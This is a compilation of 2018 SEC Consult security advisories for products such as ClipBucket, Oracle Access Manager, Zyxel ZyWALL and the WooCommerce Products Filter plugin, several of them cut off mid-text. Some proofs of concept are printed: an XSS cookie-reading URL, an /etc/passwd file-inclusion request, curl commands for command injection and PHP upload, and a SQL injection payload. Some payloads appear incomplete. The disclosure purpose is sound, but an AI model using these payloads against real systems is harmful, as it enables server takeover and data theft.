SEC Consult SA-20180514-0 :: Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet
SEC Consult Vulnerability Lab Security Advisory < 20180514-0 >
===
title: Arbitrary File Upload & Cross-site scripting
product: MyBiz MyProcureNet
vulnerable version: 5.0.0
fixed version: unknown
CVE number: -
impact: Critical
homepage: http://www.mybiz.net/
found: 2018-01-29
by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
Fikri Fadzil (Office Singapore)
Wan Ikram (Office Kuala Lumpur)
Jasveer Singh (Office Kuala Lumpur)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"MyBiz is a company fixated on developing technology which transforms the way
business is done online. At the intersection of what one business needs from
another is the potential for value to be created differently. This
intersection for the exchange of value requires technology but in
fundamentally very different ways from traditional enterprise systems. MyBiz
believes that the chemistry of business is the business relationships between
enterprises. The strength of the business relationship drives the success and
future of the business. MyBiz believes that these business relationships need
to be captured and orchestrated. MyBiz developed our proprietary Business
Relationship Network engine, a platform to capture business relationships as
data to drive new business services which create value efficiently."
Source: http://www.mybiz.net/copy-of-our-story
Business recommendation:
The vendor did not reply to our inquiries since February 2018 hence the issues
might still exist in current versions.
SEC Consult recommends not use this product until a thorough security review
has been performed by security professionals and all identified issues have
been resolved. It is assumed that MyBiz products are affected by further
critical security issues.
Vulnerability overview/description:
---
The identified vulnerabilities can be exploited after authentication but
the registration for the application is usually open for anyone.
1. Arbitrary File Upload
A malicious file can be uploaded to the webserver by an attacker. It is
possible for an attacker to upload a script to issue operating system
commands.
This vulnerability occurs because an attacker is able to adjust the
"HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary
extensions to the whitelist during the upload.
For instance, if the extension .asp is added to the
"HiddenFieldControlCustomWhiteListedExtensions" parameter, the server
accepts "secctest.asp" as legitimate file. Hence malicious files can be
uploaded in order to execute arbitrary commands to take over the server.
2. Reflected Cross-site scripting
This vulnerability within "ProxyPage.aspx" allows an attacker to inject
malicious client side scripting which will be executed in the browser of
users if they visit the manipulated site.
Proof of concept:
-
The proof of concept has been removed as no patch is available.
Vulnerable / tested versions:
-
MyBiz MyProcureNet version 5.0.0 has been tested and found to be vulnerable.
This
was the latest version available at the time of the test.
Vendor contact timeline:
2018-02-22: Contacting vendor through i...@mybiz.net (no response)
2018-02-27: Request update from vendor (no response)
2018-03-13: Trying to contact via web form http://www.mybiz.net/contact-us
(no response)
2018-05-14: Public release of security advisory
Solution:
-
None
Workaround:
---
None
Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC C
SEC Consult SA-20180503-0 :: Authentication Bypass in Oracle Access Manager (OAM)
We have published an accompanying blog post to this technical advisory with
further information:
Blog:
https://www.sec-consult.com/en/blog/2018/05/oracle-access-managers-identity-crisis/
Demo video: https://www.youtube.com/watch?v=YK7_1NozAwQ
SEC Consult Vulnerability Lab Security Advisory < 20180503-0 >
===
title: Authentication Bypass
product: Oracle Access Manager
vulnerable version: 11.1.2.3.0, 12.2.1.3.0
fixed version: April 2018 CPU
CVE number: CVE-2018-2879
impact: Critical
homepage: https://www.oracle.com/
found: 2017-11
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"Oracle Access Management provides innovative new services that complement
traditional access management capabilities. It not only provides Web SSO with
MFA, coarse grained authorization and session management but also provides
standard SAML Federation and OAuth capabilities to enable secure access to
external cloud and mobile applications. It can be easily integrated with the
Oracle Identity Cloud Service to support hybrid access management capabilities
that can help customers to seamlessly protect on-premise and cloud applications
and workloads."
URL: http://www.oracle.com/technetwork/middleware/id-mgmt/index-090417.html
Business recommendation:
SEC Consult did not conduct a full security audit as only a cryptographic
implementation was analyzed. However, since the vulnerability was found in such
a central component of the OAM, we suspect that an insufficient amount of
attention has been given to information security.
Given the central position in an organization's security infrastructure, we
recommend Oracle's customers to either conduct a full audit of the component
or to request the results of such audits from Oracle.
The security patches from the Oracle CPU April 2018 have to be applied
immediately!
Vulnerability overview/description:
---
Due to an improper usage of the CBC encryption mode, Oracle Access Manager (OAM)
is vulnerable to an authentication bypass vulnerability. An attacker can abuse
this vulnerability to log in to any resource protected by the OAM using any user
account, even administrative accounts! This security vulnerability completely
breaks the main functionality of the OAM product.
An attacker can create a scenario in which the OAM replies differently depending
on whether the PKCS#7 padding of an encrypted message is valid or invalid. This
behavior can be used to mount a padding oracle attack. An attacker can decrypt
and encrypt several messages used to communicate between the OAM and web
servers. The attack described here allows an attacker to create arbitrary
authentication cookies which are accepted by the OAM.
Proof of concept:
-
A successful user authentication with Oracle Access Manager (OAM) involves the
following steps:
1. The user accesses a protected resource.
2. A component in the web server (the Oracle Webgate) answers this request with
a redirect to the OAM. An encrypted message ("encquery") is passed to the OAM
in a URL parameter.
3. The user authenticates against the OAM (e.g. with username and password).
4. The OAM redirects the user back to the web server. Information about the
successful login is passed in the parameter "encreply".
5. The web server redirects the user to the resource that was initially
requested. An encrypted authentication token is stored in a cookie
(OAMAuthnCookie).
6. The authentication token in the OAMAuthnCookie cookie is used from now on
to authenticate the user.
All three encrypted messages (encquery, encreply, OAMAuthnCookie) are encrypted
with a CBC cipher using the same key. This key is shared between the OAM and the
web server.
The attack exploits step 2 of the authentication process: the attacker sends
manipulated "encquery" parameters and observes the server's response.
The following shows an example of a decrypted encquery:
salt=sF/vMVV0Gkr/k+IhbrXYWg== wh=agentid wu=%2F wo=1 rh=http://server:
ru=%2F
reqtime=151000 ctx= validate=
where
* the "salt" is a randomly generated value
* "validate" is a hash over certain parts of the message (MD5)
To conduct a padding oracle attack, an attacker would modify the second last
encrypted block of an encrypted message. Most of the time, this causes the
padding in the decrypted message to be invalid. In case the padding is accepted,
the attacker gains information about the p
SEC Consult SA-20180424-0 :: Reflected Cross-Site Scripting in multiple Zyxel ZyWALL products
SEC Consult Vulnerability Lab Security Advisory < 20180424-0 >
===
title: Reflected Cross-Site Scripting
product: Zyxel ZyWALL: see "Vulnerable / tested version"
vulnerable version: ZLD 4.30 and before
fixed version: ZLD 4.31
CVE number: -
impact: Medium
homepage: https://www.zyxel.com
found: 2018-02-05
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"Focused on innovation and customer-centricity, Zyxel Communications Corp. has
been connecting people to the internet for nearly 30 years. We keep promoting
creativity which meets the needs of customers. This spirit has never been
changed since we developed the world's first integrated 3-in-1 data/fax/voice
modem in 1992. Our ability to adapt and innovate with networking technology
places us at the forefront of understanding connectivity for telco/service
providers, businesses and home users.
We're building the networks of tomorrow, helping unlock the world's potential
and meeting the needs of the modern workplace; powering people at work, life
and play. We stand side-by-side with our customers and partners to share new
approaches to networking that will unleash their abilities. Loyal friend,
powerful ally, reliable resource — we are Zyxel, Your Networking Ally."
Source: https://www.zyxel.com/about_zyxel/company_overview.shtml
Business recommendation:
SEC Consult recommends Zyxel customers to upgrade the firmware to the latest
version available. A thorough security review should be performed by security
professionals to identify further potential security issues.
Vulnerability overview/description:
---
1) Reflected Cross-Site Scripting (XSS)
A reflected cross-site scripting vulnerability was identified in
'free_time_failed.cgi' in the admin interface. The parameter 'err_msg' is
returned without any sanitization of the input. An attacker, for example,
can exploit this vulnerability to steal cookies from the attacked user in
order to hijack a session and gain access to the device.
Proof of concept:
-
1) Reflected Cross-Site Scripting (XSS)
By opening the following link, contents of the 'arip' and 'zy_pc_browser'
cookies will be displayed.
http:///free_time_failed.cgi?err_msg=alert(document.cookie);
https:///free_time_failed.cgi?err_msg=alert(document.cookie);
Vulnerable / tested versions:
-
The following versions are affected:
Zyxel ZyWall USG 110 ZLD 4.30 and earlier
Zyxel ZyWall USG 210 ZLD 4.30 and earlier
Zyxel ZyWall USG 310 ZLD 4.30 and earlier
Zyxel ZyWall USG 1100 ZLD 4.30 and earlier
Zyxel ZyWall USG 1900 ZLD 4.30 and earlier
Zyxel ZyWall USG 2200-VPN ZLD 4.30 and earlier
Vendor contact timeline:
2018-02-07: Contacting vendor through secur...@zyxel.com.tw
2018-02-08: Vendor responded with contact information and a PGP key.
Sent the encrypted advisory to the contact.
2018-02-09: Contact confirmed that the advisory was received.
2018-02-16: Contact confirmed the vulnerability and stated that the ZyWALL
series
is vulnerable to the reported vulnerability. The contact also stated
that the vulnerability will be fixed until the end of March.
Requested more information regarding version numbers and other
affected devices.
2018-02-23: Contact confirmed that the devices are vulnerable in firmware
version
4.30 and before.
2018-03-21: Contact informed us that the new firmware version will be ZLD 4.31
and that it will be released on 2018-04-17. Shifted release of
advisory to 2018-04-17.
2018-04-12: Informed the contact that the advisory will be released in few days.
2018-04-17: Asked the vendor if ZLD 4.31 was released. Didn't find the new
version
on the customer portal. E-mail was blocked and returned.
2018-04-18: Found the new version (ZLD 4.31) on the customer portal.
2018-04-24: Advisory release.
Solution:
-
Install firmware version ZLD 4.31 from the vendor's website to fix this issue:
https://www.zyxel.com/support/download_landing.shtml
Workaround:
---
Restrict network access to the device.
Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC
SEC Consult SA-20180423-0 :: Multiple Stored XSS Vulnerabilities in WSO2 Carbon and Dashboard Server
SEC Consult Vulnerability Lab Security Advisory < 20180423-0 >
===
title: Multiple Stored XSS Vulnerabilities
product: WSO2 Carbon, WSO2 Dashboard Server
vulnerable version: WSO2 Identity Server 5.3.0
fixed version: WSO2 Identity Server 5.5.0
CVE number: CVE-2018-8716
impact: high
homepage: https://wso2.com/products/dashboard
found: 2017-12-13
by: W. Schober (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"WSO2 Carbon redefines middleware by providing an integrated and componentized
middleware platform that adapts to the specific needs of any enterprise
IT project - on premise or in the cloud.
100% open source and standards-based, WSO2 Carbon enables developers to rapidly
orchestrate business processes, compose applications and develop services using
WSO2 Developer Studio and a broad range of business and technical services that
integrate with legacy, packaged and SaaS applications.
The lean, complete, OSGi-based platform includes more than 175 components – OSGi
bundles or Carbon features. The WSO2 Carbon core framework functions as
“Eclipse for servers” and includes common capabilities shared by all WSO2
products, such as built-in registry, user management, transports, security,
logging, clustering, caching and throttling services, co-ordination, and a
GUI framework."
Source: https://wso2.com/products/carbon/
"The WSO2 Dashboard Server (formerly WSO2 User Engagement Server) helps to
rapidly create visually appealing and engaging web components such as
dashboards, and gadgets, and unlocking data for business intelligence and
monitoring. With the host of capabilities that Dashboard Server provides
out-of-the-box, going from data to screen has never been easier."
Source: https://wso2.com/products/dashboard-server/
Business recommendation:
SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.
Vulnerability overview/description:
---
1) Stored Cross-Site Scripting in WSO2 Dashboard (CVE-2018-8716)
The dashboard is used by the end-users to manage their accounts, change
passwords,
alter their profiles, or change certain settings. An attacker is able to inject
arbitrary JavaScript payloads into various textboxes (username, home address,
lastname, firstname, etc).
The payloads are permanently stored in the dashboard and triggered every time
the
dashboard is visited. The payload is also potentially triggered in the carbon
part of WSO2, which means that an attacker would be able to inject payloads
from the front-end application into a middleware application, which is not
accessible from the internet and attack administrators.
2) Stored Cross-Site Scripting in WSO2 Carbon
The carbon UI offers a feature to add multiple BPS-Worker Hosts. In the worker
host URL an arbitrary JavaScript payload can be injected and permanently stored
in the web application.
Proof of concept:
-
1) Stored Cross-Site Scripting in WS02 Dashboard
The following input fields are vulnerable and JavaScript payloads can be
directly
injected:
- Firstname
- Lastname
- Username
- Address
It is suspected, that all user inputs are returned unfiltered in all server
responses.
2) Stored Cross-Site Scripting in WSO2 Carbon
To demonstrate the vulnerability, it is sufficient to add a new BPS worker and
set
the URL to the following payload: ">
Everytime the carbon middleware application is accessed, the payload is
triggered.
Vulnerable / tested versions:
-
The following version has been tested which was the most recent version
at the time of discovery:
* WSO2IS 5.3.0
Vendor contact timeline:
2018-01-25: Contacting vendor through secur...@wso2.com
2018-02-08: Asking for status update. Vendor responds, that they are
still investigating the issue.
2018-02-21: Vendor responds with release date and further details
concerning the nature of the vulnerabilities. The XSS in the
Carbon component was a duplicate and should be already fixed.
Concerning the XSS in the dashboard a fix is implemented
and will be rolled out with the release of WSO2 Identity
Server 5.5.0.
2018-03-14: Requesting CVE from Mitre for the stored XSS in the Dashboard.
2018-03-15: Mitre assigned CVE-2018-8716.
2018-03-26: Vendor informed us, that the final release of the updated
software will be o
SEC Consult SA-20180314-0 :: Arbitrary Shortcode Execution & Local File Inclusion in WooCommerce Products Filter (PluginUs.Net)
SEC Consult Vulnerability Lab Security Advisory < 20180314-0 >
===
title: Arbitrary Shortcode Execution & Local File Inclusion
product: WOOF - WooCommerce Products Filter (PluginUs.Net)
vulnerable version: 1.1.9
fixed version: 2.2.0
CVE number: (requested but not yet received)
impact: Critical
homepage: https://pluginus.net/
found: 2018-02-20
by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"PluginUs.Net is a little team of talented professionals from Ukraine. Unlike
most of the big companies on the net, we believe in individual approach to
every our customer. Web development is our passion and we always try to go an
extra mile over our clients' expectations.
Our team specializes in development of WordPress plugins. It's always exciting
to try new technologies and approaches to get the project done and impress
clients by realization of their ideas!"
Source: https://pluginus.net/about-us/
Business recommendation:
SEC Consult recommends to ugprade to the latest version available
as soon as possible. Further detailed security tests should be performed
in order to identify potential other security issues.
Vulnerability overview/description:
---
1. Arbitrary Shortcode Execution
The plugin implemented a page redraw AJAX function accessible to anyone
without any authentication.
WordPress shortcode markup in the "shortcode" parameters would be evaluated.
Normally unauthenticated users can't evaluate shortcodes as they are often
sensitive.
Additionally, it is noted that there are other implemented shortcodes that are
being used in this plugin which can be abused through the same attack. Worst,
some of them could lead to remote code execution.
2. Local File Inclusion
The vulnerability is due to the lack of args/input validation on render_html
before allowing it to be called by extract(), a PHP built-in function. Because
of this, the supplied args/input can be used to overwrite the $pagepath
variable which then could lead to local file inclusion attack.
Proof of concept:
-
1. Arbitrary Shortcode Execution
The parameter "shortcode" within the "admin-ajax.php" script is affected by
the code execution vulnerability:
POST /wp-admin/admin-ajax.php HTTP/1.1
[...]
action=woof_redraw_woof=<>
2. Local File Inclusion
The parameter "shortcode" within the "admin-ajax.php" script is affected by
the local file inclusion vulnerability:
POST /wp-admin/admin-ajax.php HTTP/1.1
[...]
action=woof_redraw_woof=woof_search_options pagepath=/etc/passwd
Vulnerable / tested versions:
-
PluginUs.Net WooCommerce Products Filter version 1.1.9 has been tested and
found to be vulnerable.
Vendor contact timeline:
2018-02-20: Contacting vendor through realmag...@gmail.com
2018-02-20: Vendor agreed to proceed without encrypted channel
2018-02-21: Sent security advisory to vendor
2018-02-26: Vendor sent patch containing the fixes
2018-02-26: Informed vendor the patch doesn't fully mitigate the vulnerability
2018-03-12: Request update from vendor
2018-03-12: Vendor said they already published the patch
2018-03-14: Public release of security advisory
Solution:
-
The vendor provides an updated version and users are urged to upgrade to version
2.2.0 immediately:
https://www.woocommerce-filter.com/update-woocommerce-products-filter-v-2-2-0/
Workaround:
---
None
Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/ind
SEC Consult SA-20180312-0 :: Multiple Critical Vulnerabilities in SecurEnvoy SecurMail
SEC Consult Vulnerability Lab Security Advisory < 20180312-0 >
===
title: Multiple Critical Vulnerabilities
product: SecurEnvoy SecurMail
vulnerable version: 9.1.501
fixed version: 9.2.501 or hotfix patch "1_012018"
CVE number: CVE-2018-7701, CVE-2018-7702, CVE-2018-7703, CVE-2018-7704,
CVE-2018-7705, CVE-2018-7706, CVE-2018-7707
impact: Critical
homepage: https://www.securenvoy.com/
found: 2017-11
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"Sending and receiving encrypted emails is not an easy or simple experience.
Businesses rely on email with an increasing amount of sensitive data sent across
their networks. A revolutionary approach that doesn't suffer from the overheads
of deployment and encryption management; just rock-solid security to give you
100% confidence in your business communications."
URL: https://www.securenvoy.com/products/securmail/key-features.shtm
Business recommendation:
During a brief crash test of the SecurEnvoy SecurMail application several severe
vulnerabilities have been identified that break the core security promises of
the product.
These vulnerabilities open the possibility for several different attack
scenarios that allow an attacker to read other users' encrypted e-mails and
overwrite or delete e-mails stored in other users' inboxes.
As we have identified several critical vulnerabilities within a very short time
frame we expect numerous other vulnerabilities to be present.
As other SecureEnvoy products (besides the analyzed SecurMail) appear
to be highly integrated (all products are installed with a single setup
file) we suspect other components to also suffer from severe security deficits.
We recommend not to use SecurEnvoy products (especially SecurMail) in a
production environment until:
* a comprehensive security audit has been performed and
* state of the art security mechanisms have been adopted.
Vulnerability overview/description:
---
1) Cross Site Scripting (CVE-2018-7703, CVE-2018-7707)
SEC Consult did not find any functionality that encodes user input when creating
HTML pages. Therefore persistent and reflected cross site scripting attacks are
possible throughout the application.
Some pages fail to properly decode URL encoded parameters. Because of this,
cross
site scripting cannot be exploited on these pages in most browsers.
2) Path Traversal (CVE-2018-7705, CVE-2018-7706)
SEC Consult did not find any path traversal checks throughout the application.
Since the application uses encrypted files as the primary method of data
storage, this vulnerability can be exploited at several points.
Using this vulnerability, a legitimate recipient can read mails sent to other
recipients in plain text!
3) Insecure Direct Object Reference (CVE-2018-7704)
Authorization checks are only partially implemented. This allows a legitimate
recipient to read mails sent to other users in plain text.
4) Missing Authentication and Authorization (CVE-2018-7702)
In order to send encrypted e-mails a client does not need to authenticate on the
SecurEnvoy server. Therefore anyone with network access to the server can
arbitrarily send e-mails that appear to come from an arbitrary sender address.
Moreover, an attacker with network access to the server can re-send previous
communication to arbitrary recipients. This allows him/her to extract all
e-mails stored on the server. An attacker could also modify arbitrary messages
stored on the server.
5) Cross Site Request Forgery (CVE-2018-7701)
SEC Consult did not find any protection against cross site request forgery. An
attacker could use this vulnerability to delete a victim's e-mail or to
impersonate the victim and reply to his/her e-mails.
Since these vulnerabilities were found during a very short time frame, SEC
Consult believes that the product may contain a large number of other security
vulnerabilities. As already several core security promises have been broken
during this short crash test, no further tests were conducted.
Proof of concept:
-
1) Cross Site Scripting
a) The following HTML fragments demonstrates reflected cross site scripting
(CVE-2018-7703):
--- snip ---
--- snip ---
b) E-mails that are sent using the HTML format can contain any
SEC Consult SA-20180228-0 :: Insecure Direct Object Reference vulnerability in TestLink Open Source Test Management
SEC Consult Vulnerability Lab Security Advisory < 20180228-0 >
===
title: Insecure Direct Object Reference
product: TestLink Open Source Test Management
vulnerable version: <1.9.17
fixed version: 1.9.17 (after November 2017), and the current
"testlink_1_9" branch
CVE number: -
impact: Medium
homepage: http://testlink.org/
found: 2017-09-22
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal
Moscow - Munich - Kuala Lumpur - Singapore
Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"TestLink is a web based test management and test execution system.
It enables quality assurance teams to create and manage their test
cases as well as to organize them into test plans. These test plans
allow team members to execute test cases and track test results
dynamically."
Source: https://github.com/TestLinkOpenSourceTRMS/testlink-code
Business recommendation:
SEC Consult advises to immediately install the available updates as attackers
might gain access to sensitive data belonging to other users.
A thorough security review performed by security professionals is highly
recommended in order to identify potential further security deficiencies.
Vulnerability overview/description:
---
1) Insecure Direct Object Reference
An unauthenticated user can gain access to referenced files which are produced
by
different test cases. By using a simple ID iterator, all produced output
data can be gathered from the whole system.
The actual impact strongly depends on the classification of the produced data
which is referenced. Therefore, the risk can vary from low to critical
depending on the use case.
Proof of concept:
-
1) Insecure Direct Object Reference
An unauthenticated attacker can download data from the TestLink environment
by using the following url:
http:///lib/attachments/attachmentdownload.php?skipCheck=1=
The tag specifies the target address and can also include a sub-
folder where the hosted TestLink application is located.
Vulnerable / tested versions:
-
The following versions have been tested and are vulnerable. It is assumed that
older versions are affected as well, e.g.:
* 1.9.16
* 1.9.15
* 1.9.14
Vendor contact timeline:
2017-10-18: Contacting vendor through http://mantis.testlink.org
Vendor requested the information.
2017-10-19: Asked if the advisory should be uploaded to mantis directly.
2017-10-21: Contact agreed.
2017-10-23: Uploaded the advisory to mantis.
2017-11-01: Contact provided a fix for 1.9.16. Fixes will be created for
1.9.15 and 1.9.14 too. Vendor asked us for verification.
2017-11-07: Stated that verification is not possible at the moment (no test
instance) and that it can be verified easily with the PoC
2018-01-09: Asked for status update; No answer.
2018-01-29: Asked for status update; No answer.
2018-02-16: Asked for status update.
2018-02-17: Vendor responded that we can re-check the fix or release the
advisory.
2018-02-19: Asked the vendor for reachable test-instance, reply: there is
no test instance
2018-02-28: Public release of security advisory
Solution:
-
Check-out the current testlink-code on branch "testlink_1_9":
https://github.com/TestLinkOpenSourceTRMS/testlink-code/tree/testlink_1_9/
The following commit contains the fix since 2017-11-01:
https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/d5ffdb7634e43ba352e9567333682b6436cfb43d
Upgrade to 1.9.17 (after November 2017).
Workaround:
---
Restrict network access and do not expose the TestLink interface to the
internet.
Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal
Moscow - Munich - Kuala Lumpur - Singapore
Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Henc
SEC Consult SA-20180227-0 :: OS command injection, arbitrary file upload & SQL injection in ClipBucket
SEC Consult Vulnerability Lab Security Advisory < 20180227-0 >
===
title: OS command injection, arbitrary file upload & SQL injection
product: ClipBucket
vulnerable version: <4.0.0 - Release 4902
fixed version: 4.0.0 - Release 4902
CVE number: -
impact: critical
homepage: http://clipbucket.com/
found: 2017-09-06
by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
Wan Ikram (Office Kuala Lumpur)
Fikri Fadzil (Office Kuala Lumpur)
Jasveer Singh (Office Kuala Lumpur)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal
Moscow - Munich - Kuala Lumpur - Singapore
Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"ClipBucket is a free and open source software which helps us to create a
complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu
in few minutes of setup. It was first created in 2007 by Arslan Hassan and his
team of developers. ClipBucket was developed as a YouTube clone but has been
upgraded with advanced features and enhancements. It uses FFMPEG for video
conversion and thumbs generation which is the most widely used application so,
users can stream it straight away using the Video JS and HTML 5 Players."
Source: https://clipbucket.com/about
Business recommendation:
By exploiting the vulnerabilities documented in this advisory, an attacker can
fully compromise the web server which has ClipBucket installed. Potentially
sensitive data might get exposed through this attack.
Users are advised to immediately install the patched version provided by the
vendor.
Vulnerability overview/description:
---
1. Unauthenticated OS Command Injection
Any OS commands can be injected by an unauthenticated attacker. This is a
serious
vulnerability as the chances for the system to be fully compromised is very
high. This same vulnerability can also be exploited by authenticated attackers
with normal user privileges.
2. Unauthenticated Arbitrary File Upload
A malicious file can be uploaded into the webserver by an unauthenticated
attacker. It is possible for an attacker to upload a script to issue operating
system commands. This same vulnerability can also be exploited by an
authenticated attacker with normal user privileges.
3. Unauthenticated Blind SQL Injection
The identified SQL injection vulnerabilities enable an attacker to execute
arbitrary SQL commands on the underlying MySQL server.
Proof of concept:
-
1. Unauthenticated OS Command Injection
Without having to authenticate, an attacker can exploit this vulnerability
by manipulating the "file_name" parameter during the file upload in the script
/api/file_uploader.php:
$ curl -F "Filedata=@pfile.jpg" -F "file_name=aa.php ||<>"
http://$HOST/api/file_uploader.php
Alternatively, this vulnerability can also be exploited by authenticated basic
privileged users with the following payload by exploiting the same issue in
/actions/file_downloader.php:
$ curl --cookie "[--SNIP--]" --data "file=http://localhost/vid.mp4_name=abc
|| <>" "http://$HOST/actions/file_downloader.php;
2. Unauthenticated Arbitrary File Upload
Below is the cURL request to upload arbitrary files to the webserver with no
authentication required.
$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/beats_uploader.php;
$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/photo_uploader.php;
Furthermore, this vulnerability is also available to authenticated users with
basic privileges:
$ curl --cookie "[--SNIP--]" -F
"coverPhoto=@valid-image-with-appended-phpcode.php"
"http://$HOST/edit_account.php?mode=avatar_bg;
3. Unauthenticated Blind SQL Injection
The following parameters have been identified to be vulnerable against
unauthenticated blind SQL injection.
URL : http://$HOST/actions/vote_channel.php
METHOD : POST
PAYLOAD : channelId=channelId=1-BENCHMARK(1, rand())
The source code excerpt below shows the vulnerable code
VULN. FILE : /actions/vote_channel.php
VULN. CODE :
[...]
$vote = $_POST["vote"];
$userid = $_POST["channelId"];
//if($userquery->login_check('',true)){
if($vote == "yes"){
$query = "UPDATE " . tbl("users") . " SET
SEC Consult SA-20180221-0 :: Hijacking of arbitrary miSafes Mi-Cam video baby monitors
We have published an accompanying blog post to this technical advisory with
further information:
https://www.sec-consult.com/en/blog/2018/02/internet-of-babies-when-baby-monitors-fail-to-be-smart/index.html
SEC Consult Vulnerability Lab Security Advisory < 20180221-0 >
===
title: Hijacking of arbitrary video baby monitors
product: miSafes Mi-Cam remote video monitor
vulnerable version: Android application v1.2.0, iOS v1.0.5
Firmware v1.0.38
fixed version: -
CVE number: -
impact: critical
homepage: http://www.misafes.com/mi-cam
found: 2017-11-30
by: Mathias Frank (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal
Moscow - Munich - Kuala Lumpur - Singapore
Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Mi-CamHD, Wi-Fi remote video monitor for everyone; 720P HD quality video, easy
set up & use, two-way talk and supports free local video recording, all can be
use by our user friendly Mi-Cam app."
Source: http://www.misafes.com/mi-cam
Business recommendation:
SEC Consult recommends not to use this device until a thorough security review
has been performed by security professionals and all identified issues have
been resolved! Although cloud-connected hardware may have an advantage regarding
usability and convenience for users, if security is lacking those products pose
a great risk for all customers.
Furthermore, it seems there exist similar products from other vendors, e.g.
"Qihoo 360 Smart Home Camera", that look exactly the same and may also be
affected but SEC Consult could not verify this. The cloud component hosted by
"qiwocloud2.com" may be used by other products as well. Additional information
regarding other vendors are described in our blog post linked at the top of this
advisory.
Vulnerability overview/description:
---
The usage of the Mi-Cam video baby monitor and its Android (or iOS) application,
involves numerous requests to a cloud infrastructure available at
ipcam.qiwocloud2.com with the aim of communicating with the video baby monitor
or
respective Android application.
The Android application has at least 5-10 installations according to
Google Play Store with potentially as many iOS users as well.
SEC Consult has identified multiple critical security issues within this
product.
1) Broken Session Management & Insecure Direct Object References
The usage of the Android application "Mi-Cam" and the interaction with the
video baby monitor involves several different API calls. A number of critical
API
calls can be accessed by an attacker with arbitrary session tokens because of
broken session management.
This allows an attacker to retrieve information about the supplied account
and its connected video baby monitors. Information retrieved by this feature
is sufficient to view and interact with all connected video baby monitors for
the supplied UID.
2) Missing Password Change Verification Code Invalidation
The password forget functionality sends a 6-digit validation key which is valid
for 30 minutes to the supplied email address in order to set a new password.
Multiple codes can be requested though while previously delivered codes do not
get
invalidated and anyone of them can be used as a valid key. This can easily
be brute-forced to take over other accounts.
3) Available Serial Interface
The PCB of the video baby monitor holds an unlabeled UART interface where an
attacker is able to get hardware level access to the device and for instance
extract the firmware for further analysis. SEC Consult identified further
security
issues such as outdated software (issue 6) or weak passwords (issue 4) by
analyzing the firmware using IoT Inspector (https://www.iot-inspector.com).
4) Weak Default Credentials
The "root" user available on the video baby monitor uses very weak default
credentials with only 4 digits.
5) Enumeration of user accounts
The password reset functionality leaks information about the existence of
supplied user accounts which can aid in further (brute-force) attacks.
6) Outdated and Vulnerable Software
Several software components which are affected by publicly known
vulnerabilities were identified in the firmware of the video baby monitor.
Proof of concept:
-
As the vendor could not be reached in order to get the issues fixed we will omit
detailed proof of concept information in this advisory.
1) Broke
